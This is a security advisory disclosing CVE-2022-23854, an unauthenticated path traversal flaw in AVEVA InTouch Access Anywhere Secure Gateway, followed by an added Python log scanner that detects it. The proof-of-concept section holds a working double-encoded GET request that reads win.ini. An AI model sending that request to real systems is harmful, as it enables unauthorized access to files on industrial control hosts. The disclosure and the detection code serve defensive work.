AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal
Author: Jens Regel, CRISEC IT-Security https://crisec.de
Timeline
- 25.06.2021 Vulnerability discovered
- 25.06.2021 Details sent to custfirstsupport@aveva.com
- 21.09.2021 Vendor response, fix to be available by Q1/2022
- 25.09.2021 Vendor released Tech Alert TA000022335
- 06.09.2022 Public disclosure
CVE: CVE-2022-23854
Vendor
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
Affected Products
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older
Details
The InTouch Access Anywhere Secure Gateway versions 2020 R2 and older contain a relative path traversal vulnerability that allows an unauthenticated user with network access to read files on the system outside the Secure Gateway web server.
Proof of Concept
GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Fix
- InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
- InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix
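
Detection (added example, not part of the original advisory or vendor guidance): the proof-of-concept request hides `..\` behind two layers of percent-encoding, so a log search for a literal `..` or `%2e%2e` misses it. The sketch below percent-decodes each logged request target until it stops changing and then checks for a parent-directory segment; the log format, sample lines, and function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format assumed); the
# addresses come from documentation ranges, the paths are illustrative.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Sep/2022:10:00:01 +0000] "GET /AccessAnywhere/start.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Sep/2022:10:00:05 +0000] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 92',
    '192.0.2.11 - - [06/Sep/2022:10:00:09 +0000] "GET /AccessAnywhere/report%20v1..2.pdf HTTP/1.1" 404 0',
    '198.51.100.8 - - [06/Sep/2022:10:00:12 +0000] "GET /AccessAnywhere/%2e%2e%2fconfig HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/\d\.\d"')
# ".." counts only as a whole path segment, delimited by "/" or "\".
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def fully_decode(target, max_rounds=5):
    """Percent-decode until the string is stable; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds


def is_traversal(target):
    """Return (flagged, decoding_rounds) for one raw request target."""
    decoded, rounds = fully_decode(target)
    return bool(TRAVERSAL_RE.search(decoded)), rounds


def scan(lines):
    """Return (client, raw_target, rounds) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        flagged, rounds = is_traversal(match.group(1))
        if flagged:
            hits.append((line.split()[0], match.group(1), rounds))
    return hits


if __name__ == "__main__":
    for client, target, rounds in scan(SAMPLE_LOG):
        print(f"{client} traversal after {rounds} decoding round(s): {target}")
```

A decoding-round count of two or more is a useful signal on its own, since ordinary clients rarely double-encode path separators.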